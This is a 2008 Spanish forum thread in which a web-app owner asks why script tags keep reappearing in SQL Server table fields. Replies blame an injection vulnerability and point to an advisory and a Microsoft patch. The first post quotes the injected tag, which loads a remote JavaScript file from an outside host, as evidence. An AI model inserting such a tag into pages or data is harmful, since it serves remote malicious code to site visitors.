scripts en base de datos

rondilla · Mensaje por **rondilla** » 01 Jul 2008, 20:12

hola a todos, mi problema es el siguiente, tengo una pequeña aplicacion, publicada en un servidor web, la aplicacion web, en concreto tiene una base de datos en SQL server, y me he encontrado, no se como que se han modificado datos de esta, añadiendose scripts como este en algunos campos de las tablas

<script src=http://www.adupd.mobi/b.js></script>

los elimino pero vuelven a salir al cabo de un tiempo

alguien tiene idea de que puede ser? he analizado con nod32 y no sale nada, podria estar en algun ordenador cliente?

muchas gracias por adelantado

Mensaje por **msc hotline sat** » 01 Jul 2008, 21:30

Aqui tienes mas informacion al respecto de src=http://www.adupd.mobi/b.js

http://www.google.es/search?hl=es&q=src%3Dhttp://www.adupd.mobi/b.js&start=70&sa=N

parece ser un script inroducido en los servidores SQL por alguna vulnerabilidad... y que redirigen a esta web: http://www.adupd.mobi

voy a ver que hay en ella...

No habrás querido decir http://www.adult.mobi ???

Recuerdo que hubo un aviso de vulnerabilidad en estos servidores, a ver si lo encuentro

Ahí tienes:

https://foros.zonavirus.com/viewtopic.php?f=12&t=22951&hilit=servidores+sql

saludos

ms, 1 de Julio de 2008

Mensaje por **msc hotline sat** » 11 Jul 2008, 07:12

Y para servidores con MICROSOFT SQL SERVER , hay este nuevo parche que conviene aplicar:

http://www.microsoft.com/en/us/default.aspxspain/technet/security/bulletin/ms08-040.mspx

saludos

ms, 11-07-2008

scripts en base de datos

scripts en base de datos

Re: scripts en base de datos

Re: scripts en base de datos